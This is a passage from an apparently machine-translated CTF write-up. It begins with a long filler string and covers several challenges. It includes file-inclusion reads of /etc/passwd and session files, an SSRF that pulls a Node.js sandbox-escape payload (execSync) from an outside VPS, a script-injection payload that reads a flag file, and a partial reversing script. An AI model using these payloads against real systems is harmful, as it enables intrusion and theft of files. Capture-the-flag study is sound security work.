aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
Copy the code
flag{966fc4a2-e291-4136-84be-5bfd19b949e2}
3. Safety testing
Read http://127.0.0.1 to read the source code
You can read /etc/passwd
http://127.0.0.1/admin/include123.php?u=/etc/passwd
Read the session
http://127.0.0.1/admin/include123.php?u=/tmp/session_ef81f6c1aca58c2b24f9d63bf77dba07
http://127.0.0.1/admin/include123.php?u=/etc/passwd# input can be written to the session
Trojans will not be accessed. This route is required. After recording the route, change the browser’s PHPSession to access it
Ls found/getFlag. sh Because flags are filtered, base is required
flag{c2c15ff3-0341-49f0-9997-36b107b9cf3a}
4, crawler_z
The first time I registered yenan/ Yenan, I filled in the profile and observed token1 appeared in the URL
SSRF forgery /user/verify? token=token1
You can specify a crawl
VPS starts an HTTP
Python -m SimpleHTTPServer 11111
Then go to http://82.157.39.20:11111/escape.html#oss-cn-beijing.ichunqiu.com
Document. write is written directly in HTML, leaving out the external
<script>
document.write(this.constructor.constructor.constructor.constructor('return process')().mainModule.require('child_process').execSync('/readflag').toString());
</script>
Copy the code
flag{f0425be6-3e46-472a-8879-e19525839caf}
5, Secrets_Of_Admin
The source code to get the
admin@e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645
landing
Checksum is crhyyds, and the url is encoded when the post is submitted
Content. [] = % 3 cscript % 3 elocation href % 3 d % 22 HTTP % 3 a % 2 f % 2 f127. 0.0.1%3 a8888%2 fapi % 2 ffiles % 3 fusername % 3 dadmin % 26 filename % 3 d.. %2Ffiles%2Fflag%26checksum%3Dcrhyyds%22%3B%3C%2Fscript%3E
Flag {65453076-effe-48DC-98d5-d0d235f766F8}
reverse
1, Rev_APC
Generate DLL code
I know sha3-256, but I didn’t use it later.
Core logic: There are two ways to communicate with SYS in the DLL’s 0x1800015C0 function.
- The DLL’s 0x1800015C0 function calls NtRequestWaitReplyPort, which is received by the NtReplyWaitReceivePort function in sys. Sys actually processes the data function 0x14000298C, the algorithm is easier to understand.
- DeviceIOControl is called in DLL, and the corresponding function in SYS is 0x140003660.
And then we look at the algorithm.
exp:
from zio import *
def fun6(a, b) :
for i in range(32):
c = a[i]
if (c >= 33) & (c <= 79):
a[i] = (c - 80) & 0xff
b[i] = (b[i]+a[i])&0xff
elif (c >= 81) & (c <= 127):
a[i] = c - 48
b[i] ^= (a[i] >> 4)
elif (c > 128):
a[i] = c - 48
b[i] = (b[i]-a[i])&0xff
return a, b
def defun6(a, b) :
for i in range(32):
c = a[i]
if (c >= 33) & (c <= 79):
a[i] = (c - 80) & 0xff
b[i] = (b[i]-a[i])&0xff
elif (c >= 81) & (c <= 127):
a[i] = c - 48
b[i] ^= (a[i] >> 4)
elif (c > 128):
a[i] = c - 48
b[i] = (b[i]+a[i])&0xff
return a, b
def fun5(a, b) :
for i in range(32):
b[i] ^= a[i]
return a, b
def fun4(a, b) :
for i in range(32):
a[i] = (a[i] - 80) & 0xff
for i in range(16):
b[2 * i] ^= (16 * a[2 * i]) & 0xff
b[2 * i + 1] ^= ((a[2 * i]) >> 4) & 0xf
return a, b
def fun3(a, b) :
for i in range(32):
b[i] ^= a[i]
return a, b
def fun2(a, b) :
for i in range(32):
a[i] = (a[i] - 80) & 0xff
b[i] ^= ((a[i]>>4) &0xf) | ((a[i]<<4) &0xf0)
return a, b
def fun1(a, b) :
for i in range(32):
a[i] = (a[i]+16) &0xff
b[i] ^= a[i]
return a, b
def enc() :
b = [ord(c) for c in 'flag{12345678901234567890123456}']
#b = [91, 36, 164, 45, 64, 21, 144, 29, 194, 5, 189, 39, 240, 29, 80, 137, 178, 73, 216, 105, 177, 245, 80, 59, 99, 154, 94, 170, 79, 175, 153, 126]
''' a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex') a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC] a4 = [] for i in range(32): a4.append(ord(a3[i])^a2[i%len(a2)]) '''
a = []
